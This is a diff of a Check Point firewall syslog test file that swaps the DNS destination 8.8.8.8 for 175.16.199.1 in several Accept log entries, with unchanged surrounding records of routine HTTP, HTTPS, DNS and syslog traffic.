 <134>1 2020-03-29T16:05:33Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80c74d,0x2,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={AFDE1595-0AEA-6E48-B48E-A69F8263607D};mgmt=gw-da58d3;date=1585488025;policy_name=Standard\]"; dst:"192.124.249.31"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"52142"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"43455"; xlatesrc:"0.0.0.0"]
 <134>1 2020-03-29T16:06:20Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80c77b,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={AFDE1595-0AEA-6E48-B48E-A69F8263607D};mgmt=gw-da58d3;date=1585488025;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"64554"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T16:06:21Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80c77d,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={AFDE1595-0AEA-6E48-B48E-A69F8263607D};mgmt=gw-da58d3;date=1585488025;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38864"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
-<134>1 2020-03-29T16:06:25Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80c781,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={AFDE1595-0AEA-6E48-B48E-A69F8263607D};mgmt=gw-da58d3;date=1585488025;policy_name=Standard\]"; dst:"8.8.8.8"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"42474"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
+<134>1 2020-03-29T16:06:25Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80c781,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={AFDE1595-0AEA-6E48-B48E-A69F8263607D};mgmt=gw-da58d3;date=1585488025;policy_name=Standard\]"; dst:"175.16.199.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"42474"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T16:06:25Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80c781,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={AFDE1595-0AEA-6E48-B48E-A69F8263607D};mgmt=gw-da58d3;date=1585488025;policy_name=Standard\]"; dst:"104.81.142.43"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"58554"; service:"443"; service_id:"https"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10175"; xlatesrc:"0.0.0.0"]
 <134>1 2020-03-29T16:06:25Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80c781,0x1,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={AFDE1595-0AEA-6E48-B48E-A69F8263607D};mgmt=gw-da58d3;date=1585488025;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"34177"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T16:06:25Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80c781,0x2,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={AFDE1595-0AEA-6E48-B48E-A69F8263607D};mgmt=gw-da58d3;date=1585488025;policy_name=Standard\]"; dst:"192.124.249.31"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"52156"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10176"; xlatesrc:"0.0.0.0"]
@@ -1034,7 +1034,7 @@
 <134>1 2020-03-29T16:22:28Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80cb44,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={AFDE1595-0AEA-6E48-B48E-A69F8263607D};mgmt=gw-da58d3;date=1585488025;policy_name=Standard\]"; dst:"104.81.142.43"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"58826"; service:"443"; service_id:"https"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"26788"; xlatesrc:"0.0.0.0"]
 <134>1 2020-03-29T16:22:28Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80cb44,0x1,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={AFDE1595-0AEA-6E48-B48E-A69F8263607D};mgmt=gw-da58d3;date=1585488025;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"59719"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T16:22:29Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80cb45,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={AFDE1595-0AEA-6E48-B48E-A69F8263607D};mgmt=gw-da58d3;date=1585488025;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38864"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
-<134>1 2020-03-29T16:22:33Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80cb49,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={AFDE1595-0AEA-6E48-B48E-A69F8263607D};mgmt=gw-da58d3;date=1585488025;policy_name=Standard\]"; dst:"8.8.8.8"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43173"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
+<134>1 2020-03-29T16:22:33Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80cb49,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={AFDE1595-0AEA-6E48-B48E-A69F8263607D};mgmt=gw-da58d3;date=1585488025;policy_name=Standard\]"; dst:"175.16.199.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43173"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T16:22:33Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80cb49,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={AFDE1595-0AEA-6E48-B48E-A69F8263607D};mgmt=gw-da58d3;date=1585488025;policy_name=Standard\]"; dst:"192.124.249.36"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"64880"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10187"; xlatesrc:"0.0.0.0"]
 <134>1 2020-03-29T16:22:33Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80cb49,0x1,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={AFDE1595-0AEA-6E48-B48E-A69F8263607D};mgmt=gw-da58d3;date=1585488025;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"41773"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T16:22:33Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80cb49,0x2,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={AFDE1595-0AEA-6E48-B48E-A69F8263607D};mgmt=gw-da58d3;date=1585488025;policy_name=Standard\]"; dst:"192.124.249.31"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"52432"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10188"; xlatesrc:"0.0.0.0"]
@@ -1383,13 +1383,13 @@
 <134>1 2020-03-29T16:51:28Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d210,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.1"; log_delay:"1585500688"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"51352"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:51:29Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d210,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.1"; log_delay:"1585500688"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"40847"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:51:30Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80d212,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38864"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
-<134>1 2020-03-29T16:51:34Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d216,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"35610"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:51:34Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d216,0x1,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585500694"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"34846"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:51:34Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d216,0x2,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585500694"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"59714"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:51:35Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d217,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"44548"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:51:35Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d217,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"50096"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:51:35Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d217,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585500695"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"48563"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:51:35Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d217,0x1,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585500695"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"52162"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:51:34Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d216,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"35610"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:51:34Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d216,0x1,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585500694"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"34846"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:51:34Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d216,0x2,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585500694"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"59714"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
